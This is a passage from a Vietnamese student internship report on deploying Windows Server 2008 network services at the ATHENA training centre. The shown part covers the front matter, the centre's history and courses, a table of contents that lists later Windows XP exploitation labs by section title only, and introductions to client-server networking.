1. TRUNG TẦM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH
MẠNGQUỐC TẾ
ATHENA
BÁO CÁO THỰC TẬP
CUỐI KHÓA
NGHIÊN CỨU VÀ TRIỂN KHAI CÁC
DỊCH VỤ MẠNG TRÊN WINDOWS
SERVER 2008
Sinh viên thực hiện
: Nguyễn Đình Duy
MSSV
:
11145941
Lớp
:
NCTH5E
GVHD
: Võ Đỗ Thắng
TP. Hồ Chí Minh, Tháng 3 năm 2014.
2. TRUNG TÂM ĐÀO TẠO MẠNG & AN NINH
MẠNG QUỐC TẾ ATHENA
CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM
Độc lập – Tự do – Hạnh phúc
NHIỆM VỤ THỰC HIỆN KHÓA LUẬN
Họ tên SV : Nguyễn Đình Duy.
MSSV: 11145941.
Chuyên ngành: Công Nghệ Thông Tin.
Tên đề tài: Nghiên cứu triển khai các dịch vụ mạng trên Windows Server 2008.
Nội dung thực hiện:
Lý thuyết:
Nắmvững các bước thực hiện quản trị Windows Server 2008.
Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh khả
năng hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố, các
phương pháp bảo vệ trước nguy cơ virus, worm, trojan, spam.
Thực hành:
Cài đặt Windows Server 2008.
Nâng cấp Stand Alone thành Domain controller.
Cài đặt Windows 7.
Join Domain cho windows 7.
Tạo user account trên AD, thiết lập policy cho phép User được quyền thay đổi
ngày giờ hệ thống.
Backup cho Domain Controller.
Quản lý dịch vụ DNS,Mail,DHCP, Web, VPN trên môi trường Local và
Internet.
Thực hiện kết nối VPN, Mail Server, Web Server trên máy chủ ảo VPS.
Bảo mật Windows với khai thác mã lỗi trên Windows Xp
(MS10_042,MS12_004,MS12_027 và lỗi Adobe Reader9.X)
Thời gian thực hiện: 16/12/2013 đến 10/3/2014.
Chữ ký của SV:
TP.HCM, Ngày 3 tháng 3 năm 2014.
GIÁM ĐỐC TRUNG TÂM
(Ký và ghi rõ họ tên)
GIẢNG VIÊN HƯỚNG DẪN
(Ký và ghi rõ họ tên)
3. LỜI CẢM ƠN
Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ
trợ, giúp đỡ dù ít hay nhiều, dù trực tiếp hay gián tiếp của người khác. Trong
suốt thời gian từ khi bắt đầu học tập ở giảng đường đến nay, em đã nhận được
rất nhiều sự quan tâm, giúp đỡ của quý Thầy Cô, gia đình và bạn bè. Với lời
biết ơn sâu sắc nhất, em xin gửi đến quý Thầy Cô ở Khoa Công Nghệ Thông
Tin - Trường Đại Học Công Nghiệp Thành Phố Hồ Chí Minh đã cùng với tri
thức và tâm huyết của mình để truyền đạt vốn kiến thức quý báu cho chúng
em trong suốt thời gian học tập tại trường. Và đặc biệt, trong học kỳ này Khoa
đã tổ chức cho chúng em thực tập và được tiếp cận với môn học mà theo em là
rất hữu ích đối với sinh viên ngành Công Nghệ Thông Tin.
Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã tận tâm hướng dẫn chúng
em qua từng buổi thực tập tại Trung Tâm ATHENA cũng như những buổi nói
chuyện, thảo luận. Nếu không có những lời hướng dẫn, dạy bảo của thầy thầy
thì em nghĩ bài báo cáo này của em rất khó có thể hoàn thiện được. Một lần
nữa, em xin chân thành cảm ơn thầy.
Bài báo cáo được thực hiện trong khoảng thời gian gần 3 tháng. Bước đầu đi
vào thực tế, tìm hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do
vậy, không tránh khỏi những thiếu sót là điều chắc chắn, em rất mong nhận
được những ý kiến đóng góp quý báu của quý Thầy Cô và các bạn học cùng
lớp để kiến thức của em trong lĩnh vực này được hoàn thiện hơn.
Sau cùng, em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin
và Thầy Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện sứ
mệnh cao đẹp của mình là truyền đạt kiến thức cho thế hệ mai sau.
Trân trọng.
TP.HCM, Ngày 3 - 3- 2014
Sinh viênthực hiện
NguyễnĐình Duy
4. Mụ c Lụ c
Chương I.
Công việc thực tập: ........................................................................1
1.1
Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị
Mạng và An Ninh Mạng Quốc Tế ATHENA.................................................1
1.1.1
Trụ sở và các chi nhánh: ................................................................2
1.1.1.1
Trụ sở chính: ...........................................................................2
1.1.1.2
Cơ sở 2_Tại TP Hồ Chí Minh: ................................................2
1.1.2
Quá trình hình thành và phát triển của trung tâm: .........................2
1.1.3
Cơ cấu tổ chức: ..............................................................................4
1.1.4
Các sản phẩm, giải pháp: ...............................................................4
1.1.4.1
Các khóa học dài hạn: .............................................................4
1.1.4.2
Các khóa học ngắn hạn: ..........................................................5
1.1.4.2.1 Khóa Quản trị mạng : .........................................................5
1.1.4.2.2 Khóa thiết kế web và bảo mật mạng ..................................5
1.1.4.3
Các sản phẩm khác ..................................................................5
1.1.4.4
Cơ sở hạ tầng ...........................................................................5
1.1.4.5
Các dịch vụ hỗ trợ: ..................................................................6
1.1.5
Khách hàng.....................................................................................6
1.1.6
Đối tác ............................................................................................6
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung
cấp nhân sự CNTT, .................................................................................6
1.2
Các nhiệm vụ và dịch vụ của bộ phận thực tập ...................................6
1.3
Công việc và nhiệm vụ được phân công .............................................6
1.4
Thời gian thực tập ................................................................................7
Chương II.
Nội dung thực tập .......................................................................8
2.1
Nhiệm vụ được giao ............................................................................8
2.2
Kiến thức tìm hiểu ...............................................................................8
2.2.1
Giải pháp mạng doanh nghiệp .......................................................8
2.2.1.1
Giới thiệu về mạng doanh nghiệp ...........................................8
2.2.1.2
Các thành phần công nghệ trong mạng doanh nghiệp ............8
2.2.2
Windows Server 2008 ....................................................................9
5. 2.2.2.1
2.2.2.2
2.3
Giới thiệu về mô hình Client-Server ......................................9
Giới thiệu về Windows Server 2008 .....................................12
Các công nghệ được tiếp xúc, quá trình làm việc và các kiến thức ..15
2.3.1 Làm việc với Windows Server 2008 trên môi trường máy ảo
VMWare ....................................................................................................15
2.3.1.1.1 Cài đặt và cấu hình máy chủ Windows Server 2008 .......16
2.3.1.1.2 Khởi tạo cấu hình lần đầu tiên cho Windows Server 2008
25
2.3.1.1.3 Cài đặt dịch vụ DNS ........................................................35
2.3.1.1.4 Dịch Vụ DHCP ................................................................46
2.3.1.1.5 Cấu hình Web Server IIS. ................................................58
2.3.1.1.6 Mail Server .......................................................................66
2.3.1.1.7 Kết nối VPN .....................................................................78
2.3.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS
(Virtual private server) ..............................................................................98
2.3.2.1
Mail Server trên máy chủ ảo VPS. ......................................100
2.3.2.2
Kết Nối VPN thông qua máy chủ ảo VPS. .........................112
2.3.2.3
Cài đặt và cấu hình Web Server trên VPS. .........................132
2.3.3
Bảo mật Windows ......................................................................143
2.3.3.1
2.3.3.2
Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004.......148
2.3.3.3
Khai thác lỗ hổng trên Win XP với lỗi Adobe Reader 9.X .155
2.3.3.4
2.4
Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042
143
Khai thác lỗ hổng trên Win XP với mã lỗi MS12_027 .......159
Các kết quả đạt được .......................................................................165
2.4.1
Kinh nghiệm thực tế ...................................................................165
2.4.2
Hoàn thiện bản thân ...................................................................165
2.4.3
Các kiến thức được lĩnh hội .......................................................165
Chương III.
Kết Luận .................................................................................166
Chương IV.
Tài liệu tham khảo ..................................................................168
6. LỜI MỞ ĐẦU
Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên
phổ biến với mọi người. Chúng mang lại cho con người khả năng to lớn và
làm những công việc phi thường: tính toán nhanh và chính xác các bài toán
phức tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong
sản xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động.
Máy tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân
loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng
như nhân loại nói chung.
Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công
nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời.
Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi được kết nối thành mạng
máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa
nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng
tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của
Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp
đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server,
việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho
Windows Server 2008 hoạt động một cách trơn tru.
Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ
trương hàng đầu của nhà nước. Mạng máy tính trở thành mục tiêu nghiên cứu
và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ
kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng
viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008
nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nước, trường
học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính
phủ, tổ chức xã hội và mọi người với nhau.
Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ
trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều
kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp
em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu
về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông
minh cho mọi người sử dụng.
Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai
sót vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý
Thầy Cô, bạn bè, bạn đọc, người thân để em có thể ngày một hoàn thiện bản
thân
mình
hơn.
Xin
chân
thành
cảm
ơn!
7. Chương I.
Công việc thực tập:
1.1 Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng
và An Ninh Mạng Quốc Tế ATHENA
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế
ATHENA_Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt
Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA),
được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở
Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.
Tên
công
ty
viết
bằng
tiếng
nước
ngoài: ATHENA
ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng
động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với
quyết tâm góp phần vào công cuộc thúc đẩy tiến trình tin học hóa của nước
nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:
Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo
các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle,
Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương
trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ
Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ,
tổ chức tài chính..Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ
thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình
độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.
Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động
sản xuất kinh doanh.
Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển
cơ sở dữ liệu thông tin về các ứng dụng và sự cố mạng.
Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp
xảy ra sự cố máy tính.
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung
tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an
ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc
Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các
tỉnh,…
1
SVTT: Nguyễn Đình Duy
8. Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao
đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ
Chí Minh, HọcViệnAn Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính
Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...
1.1.1 Trụ sở và các chi nhánh:
1.1.1.1 Trụ sở chính:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99
1.1.1.2 Cơ sở 2_Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.Athena.Edu.Vn
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 20 00 88
1.1.2 Quá trình hình thành và phát triển của trung tâm:
Một nhóm các thành viên là những doanh nhân tài năng và thành công
trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc
đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ
chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của
ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực lượng
lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính
cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn
tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội.
Các thành viên sáng lập trung tâm gồm:
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena,
hiện tại là giám đốc dự án của công ty Siemen Telecom.
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS,
Phó Tổng công ty FPT.
Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách
nhiệm công nghệ thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an
ninh mạng Athena.
Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu
máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu
máy tính miền Nam.
o
o
o
o
2
SVTT: Nguyễn Đình Duy
9.
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển
mình. Trung tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh
nghiệp nhằm cài đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên
của các doanh nghiệp về các chương trình quản lý dự án MS Project 2003, kỹ
năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học
sinh_sinh viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của
Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như cơ sở để đáp ứng
nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung, các
doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động cung
cấp giải pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn
phòng đại diện tại Đà Nẵng.
Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena
mở ra thêm một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục
tuyển dụng đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp
các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc, đồng
thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội
ngũ nhân lực công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm
giàu thêm đội ngũ giảng viên của trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh
mạng mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho
Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa
Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ
thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động
không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến
khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục
sứ mạng góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng
mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung
tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở
ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một
tinh thần thép đãgiúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung
tâm đứng vững trong thời kì khủng hoảng.
3
SVTT: Nguyễn Đình Duy
10. Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến
lược. Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại
quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong
những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên
kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào
tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước
thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà.
1.1.3 Cơ cấu tổ chức:
Hình 1.1 Sơ đồ tổ chức công ty
1.1.4 Các sản phẩm, giải pháp:
1.1.4.1 Các khóa học dài hạn:
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
-
Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician.
-
Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator.
4
SVTT: Nguyễn Đình Duy
11. 1.1.4.2 Các khóa học ngắn hạn:
1.1.4.2.1
Khóa Quản trị mạng :
-
Quản trị mạng Microsoft căn bản ACBN
-
Phần cứng máy tính, laptop, server
-
Quản trị hệ thống mạng Microsoft MCSA Security.
-
Quản trị mạng Microsoft nâng cao MCSE
-
Quản trị window Vista
-
Quản trị hệ thống Window Server 2008, 2012
-
Lớp Master Exchange Mail Server
-
Quản trị mạng quốc tế Cissco CCNA
-
Quản trị hệ thống mạng Linux 1 và Linux 2.
-
1.1.4.2.2
Khóa thiết kế web và bảo mật mạng
Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart
-
Lập trình web với Php và MySQL
-
Bảo mật mạng quốc tế ACNS
-
Hacker mũ trắng
-
Athena Mastering Firewall Security
-
Bảo mật website.
1.1.4.3 Các sản phẩm khác
- Chuyên đề thực hành sao lưu và phục hồi dữ liệu
-
Chuyên đề thực hành bảo mật mạng Wi_Fi
-
Chuyên đề Ghost qua mạng
-
Chuyên đề xây dựng và quản trị diễn đàn
-
Chuyên đề bảo mật dữ liệu phòng chống nội gián
-
Chuyên đề quản lý tài sản công nghệ thông tin
- Chuyên đề kỹ năng thương mại điện tử.
1.1.4.4 Cơ sở hạ tầng
-
Thiết bị đầy đủ và hiện đại.
-
Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
5
SVTT: Nguyễn Đình Duy
12. -
Phòng máy rộng rãi, thoáng mát.
1.1.4.5 Các dịch vụ hỗ trợ:
-
Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
-
Giới thiệu việc làm cho mọi học viên
-
Thực tập có lương cho học viên khá giỏi
-
Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới
hạn thời gian
-
Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng
-
Hỗ trợ thi Chứng chỉ Quốc tế
1.1.5 Khách hàng
-
Mọi đối tượng chuyên hoặc không chuyên về CNTT.
Khách hàng chủ yếu của ATHENAlà các bạn học sinh, sinh viên và các cán
bộ công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
1.1.6 Đối tác
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân
sự CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho
các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài
chính...
1.2 Các nhiệm vụ và dịch vụ của bộ phận thực tập
Bộ phận thực tập : Bộ phận triển khai kỹ thuật.
Nhiệm vụ và dịch vụ:
Triển khai lắp đặt hệ thống mạng.
Bảo trì hệ thống mạng.
Tư vấn hỗ trợ quản trị hệ thống mạng.
1.3 Công việc và nhiệm vụ được phân công
Nghiên cứu các dịch vụ mạng trên Windows Server 2008.
6
SVTT: Nguyễn Đình Duy
13.
Triển khai các dịch vụ mạng trên Windows Server 2008.
Yêu cầu nhiệm vụ: Có kiến thức tốt về Network, System, Security.
1.4 Thời gian thực tập
Từ ngày 16/12/2013 đến ngày 10/3/2013.
7
SVTT: Nguyễn Đình Duy
14. Chương II.
Nội dung thực tập
2.1 Nhiệm vụ được giao
Nghiên cứu các dịch vụ mạng trên Windows Server 2008
Triển khai các dịch vụ mạng trên Windows Server 2008
2.2 Kiến thức tìm hiểu
2.2.1 Giải pháp mạng doanh nghiệp
2.2.1.1 Giới thiệu về mạng doanh nghiệp
Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô và
loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất nhiều
sự chọn lựa cho doanh nghiệp như cho phép doanh nghiệp tự trang bị, tự quản
lý hoặc sử dụng dịch vụ. Những doanh nghiệp lớn với hàng ngàn máy tính
cũng có những giải pháp quản lý đặc thù kết hợp cả phần cứng và phần mềm.
Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ
thông tin (CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu
cầu khác nhau về quản trị hệ thống mạng (network) của doanh nghiệp. Một hệ
thống được kiểm soát tốt sẽ làm giảm đáng kể chi phí hoạt động, nâng cao
hiệu quả cũng như độ tin cậy của hệ thống.
2.2.1.2 Các thành phần công nghệ trong mạng doanh nghiệp
Tùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp
công nghệ và thiết kế sao cho phù hợp nhất.
Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ
thống và băng thông mạng, cũng như các yêu cầu về điều khiển, giám sát
mạng. Vậy làm thế nào để một doanh nghiệp vừa và nhỏ, với một số vốn đầu
tư ban đầu hạn chế, có thể tiếp cận được với các công nghệ hiện đại, bắt kịp sự
phát triển của thế giới.
8
SVTT: Nguyễn Đình Duy
15. 2.2.2 Windows Server 2008
2.2.2.1 Giới thiệu về mô hình Client-Server
Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến việc
thực hiện một mạng lưới client/server. Thay vào đó họ chỉ tiếp tục thêm vào
các máy trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer
không cung cấp cho bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy,
không có gì ngạc nhiên khi họ thường có vấn đề với việc truy cập vào máy
trạm, bị mất dữ liệu do virus, spyware hay phải trải nghiệm việc internet bị
gián đoạn. Máy tính nối mạng theo mô hình peer-to-peer là đủ khi bạn chỉ có
một vài người dung trên mạng, nhưng khi có nhiều hơn 5 hoặc 6 người sử
dụng trên mạng của bạn, bạn thực sự phải xem xét đầu tư một máy chủ mạng.
Vậy lợi ích của mô hình Client-Server cụ thể là gì?
-
Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin là
an ninh mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản người dùng cá
nhân và nhóm, có thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu được
lưu trữ trên mạng, ngăn chặn người sử dụng trái phép truy cập tài liệu mà họ
không nên xem. Ví dụ, trong Folder chung thì group ketoan và group nhansu
cóquyền truy cập ủa nhân viên…
9
SVTT: Nguyễn Đình Duy
16. Hình 1.2 Cấu hình NTFS Permission
-
Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ được trang bị
nguồn điện dự phòng. Với một nguồn cung cấp năng lượng thứ cấp chạy song
song, sự mất mát của một trong những nguồn cung cấp điện không ảnh hưởng
đến hoạt động hệ thống bình thường. Cũng vậy với hệ thống lưu trữ của máy
chủ. Không giống như một máy tính để bàn trung bình có sử dụng một ổ cứng
duy nhất, một máy chủ sẽ thường sử dụng nhiều ổ đĩa cứng làm việc trong một
RAID cấu hình để ngăn ngừa mất dữ liệu hoặc một sự gián đoạn trong quy
trình làm việc. Ngoài ra, nhiều máy chủ cũng được trang bị ổ đĩa cứng hot
swappable và nguồn cung cấp điện. Các thành phần này có thể thay thế nóng
cho phép bạn thay thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn
phòng. Ngoài ra, kể từ khi tất cả các dữ liệu nhân viên đang được lưu trữ trên
mạng, nếu máy trạm của người dùng không giữa ngày làm việc, nhân viên có
thể truy cập các tập tin tương tự từ máy trạm khác.
10
SVTT: Nguyễn Đình Duy
17. -
Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng, tất
cả người dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay
từ bàn làm việc, tăng hiệu quả. Một số trong những nguồn tài nguyên bao
gồm:
o Tập trung lưu trữ dữ liệu ( RAID Array )
o Network Attached Storage (NAS) thiết bị
o Tháp đĩa CD / DVD
o Máy in và máy chủ Fax
-
Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của bạn là
khả năng lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì vậy, có tốt,
cập nhật, phần mềm chống virus được cài đặt trên hệ thống của bạn là một
điều cần thiết. Trong một văn phòng của 10 người hoặc ít hơn, hệ thống có thể
được duy trì riêng. Bất cứ điều gì nhiều hơn thế, tuy nhiên, có thể trở thành
một gánh nặng thực sự. Trong những trường hợp này, một gói phần mềm
chống virus kết hợp máy trạm và bảo vệ chống virus máy chủ vào một giải
pháp duy nhất có ý nghĩa hơn.
-
Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của họ một
cách thường xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên
được lưu trữ tại một địa điểm, bản sao lưu có thể được thực hiện đáng tin cậy
và nhanh chóng. Vì vậy, bạn sẽ không bao giờ cần phải lo lắng về những dữ
liệu được lưu trữ trên những gì máy trạm như bạn làm trong một mạng peerto-peer. Ngày nay, hầu hết các loại phương tiện truyền thông có thể được sử
dụng cho mục đích sao lưu. Ngoài các ổ đĩa truyền thống băng, đĩa CD, DVD,
lưu trữ và thậm chí loại bỏ Network Attached Storage (NAS) thiết bị này là
chấp nhận được. Sự lựa chọn của bạn của phương tiện truyền thông sẽ phụ
thuộc vào yêu cầu cụ thể của bạn sao lưu. Tùy thuộc vào ngân sách của bạn và
nhu cầu lưu giữ dữ liệu của bạn, bất kỳ trong số này sẽ là một giải pháp chấp
nhận được. Hãy chắc chắn rằng bạn có ít nhất một bản sao lưu hàng tuần theo
lịch trình, mặc dù hàng ngày sẽ tốt hơn.
11
SVTT: Nguyễn Đình Duy
18. 2.2.2.2 Giới thiệu về Windows Server 2008
Window Server 2008 là hệ điều hành Windows Server tân tiến nhất cho tới
thời điểm này, được thiết kế nhằm tăng sức mạnh cho các mạng, ứng dụng và
dịch vụ Web thế hệ mới. Với Windows Server 2008, bạn có thể phát triển,
cung cấp và quản lý các trải nghiệm người dùng và ứng dụng phong phú, đem
tới một hạ tầng mạng có tính bảo mật cao, và tăng cường hiệu quả về mặt
công nghệ và giá trị trong phạm vi tổ chức của mình.
Windows Server 2008 kế thừa những thành công và thế mạnh của các hệ điều
hành Windows Server thế hệ trước, đồng thời đem tới tính năng mới có giá trị
và những cải tiến mạnh mẽ cho hệ điều hành cơ sở này. Công cụ Web mới,
công nghệ ảo hóa, tính bảo mật tăng cường và các tiện ích quản lý giúp tiết
kiệm thời gian, giảm bớt các chi phí, và đem tới một nền tảng vững chắc cho
hạ tầng Công nghệ Thông tin (CNTT) của bạn.
Nền tảng chắc chắn dành cho doanh nghiệp
Windows Server 2008 đem tới một nền tảng chắc chắn đáp ứng tất cả các yêu
cầu về ứng dụng và chế độ làm việc cho máy chủ, đồng thời dễ triển khai và
quản lý. Thành phần mới Server Manager cung cấp một console quản lý hợp
nhất, đơn giản hóa và sắp xếp một cách hợp lý việc cài đặt, cấu hình và quản
lý liên tục cho máy chủ. Windows PowerShell, một shell mới kiểu dòng lệnh,
giúp quản trị viên tự động hóa các tác vụ thường trình về quản trị hệ thống
trên nhiều máy chủ. Windows Deployment Services đem tới một phương tiện
